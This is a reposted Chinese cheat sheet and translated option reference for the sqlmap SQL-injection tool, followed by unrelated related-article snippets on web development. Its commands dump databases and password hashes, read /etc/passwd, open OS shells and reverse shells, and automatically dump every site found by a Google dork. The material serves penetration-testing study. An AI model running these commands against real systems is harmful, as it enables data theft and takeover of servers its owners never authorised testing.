SQLMAP命令詳解

1.基礎信息
python sqlmap/sqlmap.py -u "http://url/news?id=1" --current-user #獲取當前用戶名稱 
python sqlmap/sqlmap.py -u "http://www.xxoo.com/news?id=1" --current-db #獲取當前數據庫名稱
python sqlmap/sqlmap.py -u "http://www.xxoo.com/news?id=1" --tables -D "db_name" #列表名 
python sqlmap/sqlmap.py -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 #列字段
python sqlmap/sqlmap.py -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0 #獲取字段內容
2.信息內容
python sqlmap/sqlmap.py -u "http://url/news?id=1"  --smart  --level 3 --users  # smart智能 level  執行測試等級
python sqlmap/sqlmap.py -u "http://url/news?id=1"  --dbms "Mysql" --users  # dbms 指定數據庫類型
python sqlmap/sqlmap.py -u "http://url/news?id=1"    --users  #列數據庫用戶
python sqlmap/sqlmap.py -u "http://url/news?id=1"    --dbs#列數據庫 
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --passwords #數據庫用戶密碼 
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --passwords-U root  -v 0 #列出指定用戶數據庫密碼
python sqlmap/sqlmap.py -u "http://url/news?id=1"     --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20  #列出指定字段,列出20條 python sqlmap/sqlmap.py -u "http://url/news?id=1"    --dump-all -v 0 #列出所有數據庫所有表
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --privileges #查看權限 
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --privileges -U root #查看指定用戶權限
python sqlmap/sqlmap.py -u "http://url/news?id=1"    --is-dba -v 1 #是否是數據庫管理員
python sqlmap/sqlmap.py -u "http://url/news?id=1"    --roles #枚舉數據庫用戶角色 
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --udf-inject #導入用戶自定義函數(獲取系統權限!)
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --dump-all --exclude-sysdbs -v 0 #列出當前庫所有表
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --union-cols #union 查詢表記錄 
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --cookie "COOKIE_VALUE" #cookie注入
python sqlmap/sqlmap.py -u "http://url/news?id=1"   -b #獲取banner信息
python sqlmap/sqlmap.py -u "http://url/news?id=1" --data "id=3"  #post注入
python sqlmap/sqlmap.py -u "http://url/news?id=1"  -v 1 -f #指紋判別數據庫類型 
python sqlmap/sqlmap.py -u "http://url/news?id=1"  --proxy"http://127.0.0.1:8118" #代理注入
python sqlmap/sqlmap.py -u "http://url/news?id=1"--string"STRING_ON_TRUE_PAGE"  #指定關鍵詞
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --sql-shell #執行指定sql命令
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --file /etc/passwd 
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --os-cmd=whoami #執行系統命令
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --os-shell #系統交互shell
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --os-pwn #反彈shell 
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --reg-read #讀取win系統注冊表
python sqlmap/sqlmap.py -u "http://url/news?id=1"    --dbs-o "sqlmap.log" #保存進度 
python sqlmap/sqlmap.py -u "http://url/news?id=1"    --dbs  -o "sqlmap.log" --resume  #恢復已保存進度sqlmap -g "google語法" --dump-all --batch  #google搜索注入點自動 跑出所有字段攻擊實例
python sqlmap/sqlmap.py -u "http://url/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password

Target(目標):

以下至少需要設置其中一個選項,設置目標URL。

-d DIRECT 直接連接到數據庫。

-u URL, --url=URL 目標URL。

-l LIST 從Burp或WebScarab代理的日志中解析目標。

-r REQUESTFILE 從一個文件中載入HTTP請求。

-g GOOGLEDORK 處理Google dork的結果作為目標URL。

-c CONFIGFILE 從INI配置文件中加載選項。

Options(選項):

--version 顯示程序的版本號并退出

-h, --help 顯示此幫助消息并退出

-v VERBOSE 詳細級別:0-6(默認為1)

Optimization(優化):

這些選項可用于優化SqlMap的性能。

-o 開啟所有優化開關

--predict-output 預測常見的查詢輸出

--keep-alive 使用持久的HTTP(S)連接

--null-connection 從沒有實際的HTTP響應體中檢索頁面長度

--threads=THREADS 最大的HTTP(S)請求并發量(默認為1)

Request(請求):

這些選項可以用來指定如何連接到目標URL。

--data=DATA 通過POST發送的數據字符串

--cookie=COOKIE HTTP Cookie頭

--cookie-urlencode URL 編碼生成的cookie注入

--drop-set-cookie 忽略響應的Set - Cookie頭信息

--user-agent=AGENT 指定 HTTP User - Agent頭

--random-agent 使用隨機選定的HTTP User - Agent頭

--referer=REFERER 指定 HTTP Referer頭

--headers=HEADERS 換行分開,加入其他的HTTP頭

--auth-type=ATYPE HTTP身份驗證類型(基本,摘要或NTLM)(Basic, Digest or NTLM)

--auth-cred=ACRED HTTP身份驗證憑據(用戶名:密碼)

--auth-cert=ACERT HTTP認證證書(key_file,cert_file)

--proxy=PROXY 使用HTTP代理連接到目標URL --proxy http://127.0.0.1:8888

--proxy-cred=PCRED HTTP代理身份驗證憑據(用戶名:密碼)

--ignore-proxy 忽略系統默認的HTTP代理

--delay=DELAY 在每個HTTP請求之間的延遲時間,單位為秒 --delay 0.5

--timeout=TIMEOUT 等待連接超時的時間(默認為30秒)

--retries=RETRIES 連接超時后重新連接的時間(默認3)

--scope=SCOPE 從所提供的代理日志中過濾器目標的正則表達式

--safe-url=SAFURL 在測試過程中經常訪問的url地址

--safe-freq=SAFREQ 兩次訪問之間測試請求,給出安全的URL

Injection(注入):

這些選項可以用來指定測試哪些參數, 提供自定義的注入payloads和可選篡改腳本。

-p TESTPARAMETER 可測試的參數(S)

--dbms=DBMS 強制后端的DBMS為此值 如:--dbms "Mysql"

--os=OS 強制后端的DBMS操作系統為這個值

--prefix=PREFIX 注入payload字符串前綴

--suffix=SUFFIX 注入payload字符串后綴

--tamper=TAMPER 使用給定的腳本(S)篡改注入數據

Techniques(技巧):

這些選項可用于調整具體的SQL注入測試。

--technique=TECH SQL注入技術測試(默認BEUST)

--time-sec=TIMESEC DBMS響應的延遲時間(默認為5秒)

--union-cols=UCOLS 定列范圍用于測試UNION查詢注入

--union-char=UCHAR 用于暴力猜解列數的字符

Fingerprint(指紋):

-f, --fingerprint 執行檢查廣泛的DBMS版本指紋

Detection(檢測):

這些選項可以用來指定在SQL盲注時如何解析和比較HTTP響應頁面的內容。

--level=LEVEL 執行測試的等級(1-5,默認為1)

--risk=RISK 執行測試的風險(0-3,默認為1)

--string=STRING 查詢時有效時在頁面匹配字符串

--regexp=REGEXP 查詢時有效時在頁面匹配正則表達式

--text-only 僅基于在文本內容比較網頁

Enumeration(枚舉):

這些選項可以用來列舉后端數據庫管理系統的信息、表中的結構和數據。此外,您還可以運行您自己

的SQL語句。

-b, --banner 檢索數據庫管理系統的標識

--current-user 檢索數據庫管理系統當前用戶

--current-db 檢索數據庫管理系統當前數據庫

--is-dba 檢測DBMS當前用戶是否DBA

--users 枚舉數據庫管理系統用戶

--passwords 枚舉數據庫管理系統用戶密碼哈希

--privileges 枚舉數據庫管理系統用戶的權限

--roles 枚舉數據庫管理系統用戶的角色

--dbs 枚舉數據庫管理系統數據庫

--tables 枚舉的DBMS數據庫中的表

--columns 枚舉DBMS數據庫表列

--dump 轉儲數據庫管理系統的數據庫中的表項

--dump-all 轉儲所有的DBMS數據庫表中的條目

--search 搜索列(S),表(S)和/或數據庫名稱(S)

-D DB 要進行枚舉的數據庫名

-T TBL 要進行枚舉的數據庫表

-C COL 要進行枚舉的數據庫列

-U USER 用來進行枚舉的數據庫用戶

--exclude-sysdbs 枚舉表時排除系統數據庫

--start=LIMITSTART 第一個查詢輸出進入檢索

--stop=LIMITSTOP 最后查詢的輸出進入檢索

--first=FIRSTCHAR 第一個查詢輸出字的字符檢索

--last=LASTCHAR 最后查詢的輸出字字符檢索

--sql-query=QUERY 要執行的SQL語句

--sql-shell 提示交互式SQL的shell

File system access(訪問文件系統):

這些選項可以被用來訪問后端數據庫管理系統的底層文件系統。

--file-read=RFILE 從后端的數據庫管理系統文件系統讀取文件

--file-write=WFILE 編輯后端的數據庫管理系統文件系統上的本地文件

--file-dest=DFILE 后端的數據庫管理系統寫入文件的絕對路徑

Brute force(蠻力):

這些選項可以被用來運行蠻力檢查。

--common-tables 檢查存在共同表

--common-columns 檢查存在共同列

User-defined function injection(用戶自定義函數注入):

這些選項可以用來創建用戶自定義函數。

--udf-inject 注入用戶自定義函數

--shared-lib=SHLIB 共享庫的本地路徑

Operating system access(操作系統訪問):

這些選項可以用于訪問后端數據庫管理系統的底層操作系統。

--os-cmd=OSCMD 執行操作系統命令

--os-shell 交互式的操作系統的shell

--os-pwn 獲取一個OOB shell,meterpreter或VNC

--os-smbrelay 一鍵獲取一個OOB shell,meterpreter或VNC

--os-bof 存儲過程緩沖區溢出利用

--priv-esc 數據庫進程用戶權限提升

--msf-path=MSFPATH Metasploit Framework本地的安裝路徑

--tmp-path=TMPPATH 遠程臨時文件目錄的絕對路徑

General(一般):

這些選項可以用來設置一些一般的工作參數。

-t TRAFFICFILE 記錄所有HTTP流量到一個文本文件中

-s SESSIONFILE 保存和恢復檢索會話文件的所有數據

--flush-session 刷新當前目標的會話文件

--fresh-queries 忽略在會話文件中存儲的查詢結果

--eta 顯示每個輸出的預計到達時間

--update 更新SqlMap

--save file保存選項到INI配置文件

--batch 從不詢問用戶輸入,使用所有默認配置。

Windows注冊表訪問:

這些選項可以被用來訪問后端數據庫管理系統Windows注冊表。

--reg-read 讀一個Windows注冊表項值

--reg-add 寫一個Windows注冊表項值數據

--reg-del 刪除Windows注冊表鍵值

--reg-key=REGKEY Windows注冊表鍵

--reg-value=REGVAL Windows注冊表項值

--reg-data=REGDATA Windows注冊表鍵值數據

--reg-type=REGTYPE Windows注冊表項值類型

Miscellaneous(雜項):

--beep 發現SQL注入時提醒

--check-payload IDS對注入payloads的檢測測試

--cleanup SqlMap具體的UDF和表清理DBMS

--forms 對目標URL的解析和測試形式

--gpage=GOOGLEPAGE 從指定的頁碼使用谷歌dork結果

--page-rank Google dork結果顯示網頁排名(PR)

--parse-errors 從響應頁面解析數據庫管理系統的錯誤消息

--replicate 復制轉儲的數據到一個sqlite3數據庫

--tor 使用默認的Tor(Vidalia/ Privoxy/ Polipo)代理地址

--wizard 給初級用戶的簡單向導界面

轉載于:https://www.cnblogs.com/ssda/p/8352955.html

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/251047.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/251047.shtml
英文地址,請注明出處:http://en.pswp.cn/news/251047.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Nginx命令大全

sudo nginx #打開 nginx nginx -s reload|reopen|stop|quit #重新加載配置|重啟|停止|退出 nginx nginx -t #測試配置是否有語法錯誤nginx [-?hvVtq] [-s signal] [-c filename] [-p prefix] [-g directives]-?,-h : 打開幫助信息 -v : 顯示版本信…

ES6-1 ES6版本過渡歷史

一 歷史 HTML HTML 1, HTML 2, HTML 3 1991-1997 IETF(the Internet Engineering Task Force) 國際互聯網工程任務組1997.1 HTML3.2 W3C JavaScript 1995 liveScript(后改名為JavaScript1996年改名)1996 javascript 1.0 1.1;1997 Jscript1997.6 ECMAScript 1.01998.6 ECMAS…

oracle 數據庫查詢 COALESCE字符函數

功能:返回其參數中的第一個非空表達式,當你要在n個字段中選取某一個非空值 coalesce函數返回參數(列名)中第一個非NULL的字段值,注意不是為空 select COALESCE(t1.a ,t2.a) as a from table_a t1left join table_b t2…

Django-model進階

知識預覽 QuerySet中介模型查詢優化extra整體插入回到頂部QuerySet 可切片 使用Python 的切片語法來限制查詢集記錄的數目 。它等同于SQL 的LIMIT 和OFFSET 子句。 1>>> Entry.objects.all()[:5] # (LIMIT 5)>>> Entry.objects.all()[5:10] # (OFFSE…

vue --- 修飾符.lazy、.number、.trim

.lazy: 會在轉變為change事件中同步 <div id"app"><input type"text" v-model.lazy"message"><p>{{ message }}</p> </div> <script>const app new Vue({el:#app,data: {message: }}) </script> //…

ES6-2 塊級作用域與嵌套、let、暫行性死區

注意&#xff0c;寫在開頭 function test(x 1) {var x // 不報錯console.log(x) } function test1(x 1) {let x 10 // 報錯console.log(x) }let的變量名不可以和參數中的名稱相同。而var并不限制&#xff0c;說白了就是希望你規范使用變量名。 形參原則上數組函數內部的臨…

常用的操作系統知識

為什么要有操作系統 現代計算機系統是由一個或者多個處理器&#xff0c;主存&#xff0c;磁盤&#xff0c;打印機&#xff0c;鍵盤&#xff0c;鼠標顯示器&#xff0c;網絡接口以及各種其他輸入&#xff0c;輸出設備組成的復雜系統&#xff0c;每位程序員不可能掌握所有系統實現…

vue --- 使用中央事件總線(bus)實現跨組件通信

使用Bus實現跨組件傳輸須注意以下3點: 1.需要創建一個空的Vue實例(bus),來作為中間站 2.使用bus.emit來發送事件3.使用bus.emit來發送事件 3.使用bus.emit來發送事件3.使用bus.on來監聽事件(在鉤子created中監聽) 代碼如下: <!DOCTYPE html> <html> <head>…

Execution Order of Event Functions, unity 3d 事件函數的執行順序

vs_Community.exe --layout "F:\linson\vs2017 comm\offline" --lang zh-CN 學習unity3d&#xff0c;感覺事件順序很重要。就翻譯一下官方文檔吧。 Execution Order of Event Functions 事件函數的執行順序 In Unity scripting, there are a number of event functio…

ES6-3 let進階、const、全部變量與頂層對象

一 const 1. 定義常量 1.1 引入模塊時 const test require(http)1.2 定義時必須賦值(初始化)且不可修改 const a; // Uncaught SyntaxError: Missing initializer in const declaration若賦值為原始值&#xff0c;不可修改若賦值為引用值&#xff0c;對于的地址不可修改&a…

前后端如何通信

目錄 前后端如何通信URL . URI . URN第一部分&#xff1a;傳輸協議第二部分&#xff1a;域名第三部分&#xff1a;端口號第四部分&#xff1a;請求資源文件的路徑名稱第五部分&#xff1a;問號傳參第六部分&#xff1a;HASH值前后端如何通信 前段&#xff1a;客戶端 后端&#…

vue --- 獲取子組件數據的一個應急方案$refs

使用$refs需要注意以下2點: 1.html方法使用子組件時,需使用ref “xxx” 聲明. 2.在父組件中使用,this.refs.xxx.msg 獲取數據 <!DOCTYPE html> <html> <head> <meta charset"utf-8"> </head> <body><div id"app"…

Mysql 根據出生日期計算年齡

最近因為業務要求需要根據出生日期計算年齡&#xff0c;在網上查了好多的方法&#xff0c;在這里總結一下。 網上的計算方法好多都提到了格里高利歷法&#xff0c;特意去查了下資料&#xff0c;普及點知識。 格里高利歷是公歷的標準名稱&#xff0c;是一種源自于西方社會的歷法…

ES6-4/5 解構賦值、函數默認值、數組解構、對象解構

ES-4 解構賦值、函數默認值、數組解構、對象解構 ES-5 隱式轉換、函數參數解構、解構本質、()用法 一 解構賦值 1 虛值 含義&#xff1a;在Boolean轉換結果為假的值falsy 2 函數默認值 ES6 內部使用嚴格相等運算符&#xff08;&#xff09;&#xff0c;判斷一個位置是否有值…

springboot之session、cookie

1- 獲取session的方案 session: https://blog.csdn.net/yiifaa/article/details/77542208 2- session什么時候創建&#xff1f; 一個常見的誤解是以為session在有客戶端訪問時就被創建&#xff0c;然而事實是直到某server端程序調用HttpServletRequest.getSession(true)這樣…

echarts --- 多折線圖按段顯示顏色規則訂制

描述: 圖中有4個序列,序列1和序列2在同一個x軸下,顯示不同的顏色.(如,在-40到-30,序列一是紅色,而序列2是黑色) 關鍵: VisualMap中的seriesIndex屬性(根據不同的系列,制定不同的顏色規則). 下面是代碼,可以直接復制到 echart實例 中進行調試 var symbolSize 20; var data [[…

Git-分布式版本控制系統

一、版本控制 版本控制系統是記錄若干文件內容變化&#xff0c;以便將來查閱修訂特定版本或還原部分文件的系統 分為&#xff1a;集中式版本控制系統&#xff08;svn&#xff09;簡稱cvcs 都有一個單一集中管理服務器&#xff0c;保存所有文件修訂版本&#xff0c;開發人員通…

ES6-6 - this指向、箭頭函數基本形式、rest運算符

一 chrome斷點調試 觀察函數調用棧 // 25min var x 1; function foo(x, y function () { x 2; console.log(2) }) {var x 3;y();console.log(x) } foo() console.log(x) // 2 3 1var x 1; function foo(x, y function () { x 2; console.log(x) }) {x 3;y();console.…

【二分答案】Problem C:木材加工

Problem C:木材加工 Time Limit:1000MS Memory Limit:65536K Total Submit:48 Accepted:20 Description 【問題描述】 木材廠有一些原木&#xff0c;現在想把這些木頭切割成一些長度相同的小段木頭&#xff08;木頭有可能有剩余&#xff09;&#xff0c;需要得到的小段的數目是…

vue --- vue.js實戰基礎篇課后練習

練習1:在輸入框聚焦時,增加對鍵盤上下鍵按鍵的支持,相當于加1和減1 練習2:增加一個控制步伐的prop-step,比如設置為10,點擊加號按鈕,一次增加10 思路: // 考慮到子模板的復用性,即在父模板中復用如下: <input-number v-model"value" :max"10" :min&qu…